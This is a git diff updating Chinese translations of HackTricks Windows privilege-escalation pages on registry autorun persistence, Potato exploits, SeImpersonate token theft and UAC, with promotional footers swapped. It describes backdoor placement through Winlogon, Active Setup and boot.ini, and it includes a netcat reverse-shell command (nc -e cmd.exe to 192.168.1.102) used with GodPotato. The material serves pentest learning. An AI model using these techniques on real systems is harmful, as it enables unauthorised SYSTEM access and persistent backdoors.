-如果您可以覆盖**HKLM**下的任何\[User] Shell Folder,您将能够将其指向您控制的文件夹,并放置一个后门,每当用户登录系统时都会执行,从而提升权限。
+如果您可以覆盖**HKLM**下的任何\[用户] Shell Folder,您将能够将其指向您控制的文件夹,并放置一个后门,该后门将在用户登录系统时执行,从而提升权限。
{% endhint %}
```bash
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
@@ -180,11 +181,11 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
```
-### Winlogon Keys
+### Winlogon 键
`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`
-通常,**Userinit** 键被设置为 **userinit.exe**。但是,如果修改了此键,则指定的可执行文件也将由 **Winlogon** 在用户登录时启动。同样,**Shell** 键旨在指向 **explorer.exe**,这是 Windows 的默认 shell。
+通常,**Userinit** 键设置为 **userinit.exe**。然而,如果此键被修改,指定的可执行文件将在用户登录时由 **Winlogon** 启动。同样,**Shell** 键旨在指向 **explorer.exe**,这是 Windows 的默认外壳。
```bash
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
@@ -192,7 +193,7 @@ Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVers
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
```
{% hint style="info" %}
-如果您可以覆盖注册表值或二进制文件,则可以提升权限。
+如果您可以覆盖注册表值或二进制文件,您将能够提升权限。
{% endhint %}
### 策略设置
@@ -211,19 +212,19 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion
### 更改安全模式命令提示符
-在Windows注册表中的 `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot` 下,默认设置了一个名为 **`AlternateShell`** 的数值,其数值为 `cmd.exe`。这意味着当您在启动时选择“带命令提示符的安全模式”(按 F8 键),将使用 `cmd.exe`。但是,可以设置计算机自动启动到此模式,而无需按 F8 并手动选择它。
+在 Windows 注册表的 `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot` 下,有一个默认设置为 `cmd.exe` 的 **`AlternateShell`** 值。这意味着当你在启动时选择“带命令提示符的安全模式”(通过按 F8),将使用 `cmd.exe`。但是,可以设置计算机在不需要按 F8 和手动选择的情况下自动以此模式启动。
-创建一个用于自动启动“带命令提示符的安全模式”的引导选项的步骤:
+创建自动在“带命令提示符的安全模式”中启动的启动选项的步骤:
-1. 更改 `boot.ini` 文件的属性,以移除只读、系统和隐藏标志:`attrib c:\boot.ini -r -s -h`
+1. 更改 `boot.ini` 文件的属性以移除只读、系统和隐藏标志:`attrib c:\boot.ini -r -s -h`
2. 打开 `boot.ini` 进行编辑。
-3. 插入一行类似于:`multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
-4. 保存更改到 `boot.ini`。
+3. 插入一行,如:`multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
+4. 保存对 `boot.ini` 的更改。
5. 重新应用原始文件属性:`attrib c:\boot.ini +r +s +h`
-* **Exploit 1:** 更改 **AlternateShell** 注册表键允许设置自定义命令 shell,可能用于未经授权的访问。
-* **Exploit 2 (PATH 写入权限):** 对系统 **PATH** 变量的任何部分具有写入权限,特别是在 `C:\Windows\system32` 之前,可以执行自定义的 `cmd.exe`,如果系统在安全模式下启动,则可能成为后门。
-* **Exploit 3 (PATH 和 boot.ini 写入权限):** 对 `boot.ini` 的写入访问权限使安全模式自动启动,从而在下次重启时促进未经授权的访问。
+* **Exploit 1:** 更改 **AlternateShell** 注册表键允许自定义命令 shell 设置,可能用于未经授权的访问。
+* **Exploit 2 (PATH 写权限):** 对系统 **PATH** 变量的任何部分具有写权限,特别是在 `C:\Windows\system32` 之前,可以执行自定义的 `cmd.exe`,如果系统在安全模式下启动,这可能是一个后门。
+* **Exploit 3 (PATH 和 boot.ini 写权限):** 对 `boot.ini` 的写访问使得自动安全模式启动成为可能,从而在下次重启时促进未经授权的访问。
要检查当前的 **AlternateShell** 设置,请使用以下命令:
```bash
@@ -232,62 +233,62 @@ Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Co
```
### 已安装组件
-Active Setup 是 Windows 中的一个功能,在桌面环境完全加载之前启动。它优先执行某些命令,这些命令必须在用户登录继续之前完成。这个过程甚至发生在其他启动条目之前,比如在 Run 或 RunOnce 注册表部分触发的条目。
+Active Setup 是 Windows 中的一个功能,它**在桌面环境完全加载之前启动**。它优先执行某些命令,这些命令必须在用户登录之前完成。此过程甚至在其他启动项(例如 Run 或 RunOnce 注册表部分中的项)被触发之前发生。
Active Setup 通过以下注册表键进行管理:
-- `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`
-- `HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
-- `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
-- `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
+* `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`
+* `HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
+* `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
+* `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
-在这些键中,存在各种子键,每个对应一个特定的组件。特别感兴趣的键值包括:
+在这些键中,存在多个子键,每个子键对应一个特定组件。特别关注的键值包括:
-- **IsInstalled:**
- - `0` 表示组件的命令不会执行。
- - `1` 表示命令将为每个用户执行一次,这是默认行为,如果缺少 `IsInstalled` 值。
-- **StubPath:** 定义由 Active Setup 执行的命令。它可以是任何有效的命令行,比如启动 `notepad`。
+* **IsInstalled:**
+* `0` 表示该组件的命令将不会执行。
+* `1` 表示命令将为每个用户执行一次,如果缺少 `IsInstalled` 值,则这是默认行为。
+* **StubPath:** 定义 Active Setup 要执行的命令。它可以是任何有效的命令行,例如启动 `notepad`。
-**安全洞察:**
+**安全洞察:**
-- 修改或写入 `IsInstalled` 设置为 `"1"` 的键,具有特定 `StubPath` 的键可能导致未经授权的命令执行,潜在地用于特权升级。
-- 修改任何 `StubPath` 值中引用的二进制文件也可能实现特权升级,如果有足够的权限。
+* 修改或写入 **`IsInstalled`** 设置为 `"1"` 的键,并指定 **`StubPath`** 可能导致未经授权的命令执行,从而可能实现权限提升。
+* 更改任何 **`StubPath`** 值中引用的二进制文件也可能实现权限提升,前提是具有足够的权限。
-要检查 Active Setup 组件中的 `StubPath` 配置,可以使用以下命令:
+要检查 Active Setup 组件中的 **`StubPath`** 配置,可以使用以下命令:
```bash
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
```
-### 浏览器辅助对象
+### Browser Helper Objects
-### 浏览器辅助对象(BHOs)概述
+### Overview of Browser Helper Objects (BHOs)
-浏览器辅助对象(BHOs)是DLL模块,可为微软的Internet Explorer添加额外功能。它们在每次启动时加载到Internet Explorer和Windows Explorer中。然而,通过将**NoExplorer**键设置为1,可以阻止它们在Windows Explorer实例中加载,从而阻止它们执行。
+Browser Helper Objects (BHOs) 是 DLL 模块,旨在为 Microsoft 的 Internet Explorer 添加额外功能。它们在每次启动时加载到 Internet Explorer 和 Windows Explorer 中。然而,通过将 **NoExplorer** 键设置为 1,可以阻止它们的执行,从而防止它们与 Windows Explorer 实例一起加载。
-BHOs通过Internet Explorer 11与Windows 10兼容,但不支持Microsoft Edge,这是较新版本Windows中的默认浏览器。
+BHOs 通过 Internet Explorer 11 与 Windows 10 兼容,但在 Microsoft Edge(新版本 Windows 的默认浏览器)中不受支持。
-要查看系统上注册的BHOs,可以检查以下注册表键:
+要探索系统上注册的 BHOs,可以检查以下注册表键:
-- `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
-- `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
+* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
+* `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
-每个BHO在注册表中由其**CLSID**表示,作为唯一标识符。有关每个CLSID的详细信息可以在`HKLM\SOFTWARE\Classes\CLSID\{}`下找到。
+每个 BHO 在注册表中由其 **CLSID** 表示,作为唯一标识符。有关每个 CLSID 的详细信息可以在 `HKLM\SOFTWARE\Classes\CLSID\{}` 下找到。
-要查询注册表中的BHOs,可以使用以下命令:
+要在注册表中查询 BHOs,可以使用以下命令:
```bash
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
```
-### Internet Explorer Extensions
+### Internet Explorer 扩展
* `HKLM\Software\Microsoft\Internet Explorer\Extensions`
* `HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions`
-请注意,注册表中将包含每个dll的1个新注册表,并且将由 **CLSID** 表示。您可以在 `HKLM\SOFTWARE\Classes\CLSID\{}` 中找到 CLSID 信息。
+注意,注册表将为每个 dll 包含 1 个新的注册表项,并由 **CLSID** 表示。您可以在 `HKLM\SOFTWARE\Classes\CLSID\{}` 中找到 CLSID 信息。
-### Font Drivers
+### 字体驱动程序
* `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers`
* `HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers`
@@ -314,15 +315,15 @@ HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Executi
```
## SysInternals
-请注意,您可以找到自动运行的所有站点都已经被**winpeas.exe**搜索过。但是,为了获得更全面的自动执行文件列表,您可以使用[systinternals的autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)。
+请注意,您可以找到 autoruns 的所有站点 **已经被**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) **搜索过**。然而,对于 **更全面的自动执行** 文件列表,您可以使用来自 Sysinternals 的 [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns):
```
autorunsc.exe -m -nobanner -a * -ct /accepteula
```
## 更多
-**查找更多类似注册表的自动运行程序,请访问** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)
+**在** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2) **中查找更多类似的自动运行注册表。**
-## 参考资料
+## 参考文献
* [https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref](https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref)
* [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
@@ -331,20 +332,21 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula
-**漏洞悬赏提示**:**注册** Intigriti,一个由黑客创建的高级**漏洞悬赏平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的悬赏!
+**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
+{% hint style="success" %}
+学习与实践 AWS 黑客攻击:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习与实践 GCP 黑客攻击:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
index 555702990..2d055cf59 100644
--- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -1,26 +1,27 @@
# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
### [WhiteIntel](https://whiteintel.io)
-[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
+[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **攻击**。
-WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
+WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@@ -29,7 +30,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
***
{% hint style="warning" %}
-**JuicyPotato在Windows Server 2019和Windows 10版本1809及更高版本上无法使用**。但是,[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**、**[**GodPotato**](https://github.com/BeichenDream/GodPotato)可以用来**获取相同的权限并获得`NT AUTHORITY\SYSTEM`**级别的访问权限。这篇[博文](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)深入介绍了`PrintSpoofer`工具,该工具可用于在JuicyPotato不再适用的Windows 10和Server 2019主机上滥用模拟权限。
+**JuicyPotato 在 Windows Server 2019 和 Windows 10 build 1809 及之后的版本上无法工作**。然而, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) 可以用来 **利用相同的权限并获得 `NT AUTHORITY\SYSTEM`** 级别的访问权限。此 [博客文章](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) 深入探讨了 `PrintSpoofer` 工具,该工具可用于在 JuicyPotato 不再有效的 Windows 10 和 Server 2019 主机上滥用模拟权限。
{% endhint %}
## 快速演示
@@ -83,7 +84,7 @@ nt authority\system
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
-## 参考资料
+## 参考文献
* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
* [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
@@ -95,24 +96,25 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
-[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
+[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**。
-WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
+WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index 5187c4c33..7fcd5f1ce 100644
--- a/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -1,23 +1,24 @@
-# 从高权限到系统的 SeImpersonate
+# SeImpersonate from High To System
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
### 代码
-以下代码来自[这里](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。它允许**将一个进程 ID 作为参数**,并且将作为指定进程用户的 CMD 运行。\
-在高完整性进程中,您可以**指定一个以 System 身份运行的进程的 PID**(如 winlogon、wininit),并以系统身份执行 cmd.exe。
+以下代码来自 [这里](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。它允许**将进程 ID 作为参数指示**,并将以指定进程的用户身份运行的 CMD **运行**。\
+在高完整性进程中,您可以**指示一个以 System 身份运行的进程的 PID**(如 winlogon、wininit),并以系统身份执行 cmd.exe。
```cpp
impersonateuser.exe 1234
```
@@ -156,7 +157,7 @@ return 0;
### 错误
-在某些情况下,您可能尝试模拟System用户,但会出现以下类似的输出:
+在某些情况下,您可能尝试模拟系统,但它不会工作,显示如下输出:
```cpp
[+] OpenProcess() success!
[+] OpenProcessToken() success!
@@ -167,22 +168,37 @@ return 0;
[-] CreateProcessWithTokenW Return Code: 0
[-] CreateProcessWithTokenW Error: 1326
```
-这意味着即使您在高完整性级别上运行,**权限仍不足**。\
-让我们使用**进程资源管理器**(或者您也可以使用进程管理器)检查`svchost.exe`进程的当前管理员权限:
+这意味着即使您在高完整性级别上运行,**您也没有足够的权限**。\
+让我们检查当前管理员对 `svchost.exe` 进程的权限,使用 **processes explorer**(或者您也可以使用 process hacker):
-1. 选择一个`svchost.exe`进程
-2. 右键单击 --> 属性
+1. 选择一个 `svchost.exe` 进程
+2. 右键点击 --> 属性
3. 在“安全”选项卡中,点击右下角的“权限”按钮
4. 点击“高级”
-5. 选择“管理员”并点击“编辑”
+5. 选择“Administrators”并点击“编辑”
6. 点击“显示高级权限”
.png>)
-上图显示了“管理员”对所选进程的所有权限(如您所见,对于`svchost.exe`,他们只有“查询”权限)
+上面的图像包含“Administrators”对所选进程的所有权限(如您所见,在 `svchost.exe` 的情况下,他们只有“查询”权限)
-查看“管理员”对`winlogon.exe`的权限:
+查看“Administrators”对 `winlogon.exe` 的权限:
.png>)
-在该进程中,“管理员”可以“读取内存”和“读取权限”,这可能允许管理员模拟此进程使用的令牌。
+在该进程中,“Administrators”可以“读取内存”和“读取权限”,这可能允许管理员模拟该进程使用的令牌。
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/windows-hardening/windows-security-controls/uac-user-account-control.md b/windows-hardening/windows-security-controls/uac-user-account-control.md
index 23ee5f645..d9af90160 100644
--- a/windows-hardening/windows-security-controls/uac-user-account-control.md
+++ b/windows-hardening/windows-security-controls/uac-user-account-control.md
@@ -1,29 +1,30 @@
-# UAC - 用户账户控制
+# UAC - 用户帐户控制
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
-- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
 (1) (1) (1) (1) (1) (1).png)
-使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
+使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## UAC
-[用户账户控制(UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)是一项功能,它为**提升的活动启用了一个同意提示**。应用程序具有不同的`完整性`级别,具有**高级别**的程序可以执行可能**危及系统的任务**。启用UAC后,应用程序和任务始终以非管理员帐户的安全上下文下运行,除非管理员明确授权这些应用程序/任务具有管理员级别访问权限以运行系统。这是一个方便的功能,可保护管理员免受意外更改,但不被视为安全边界。
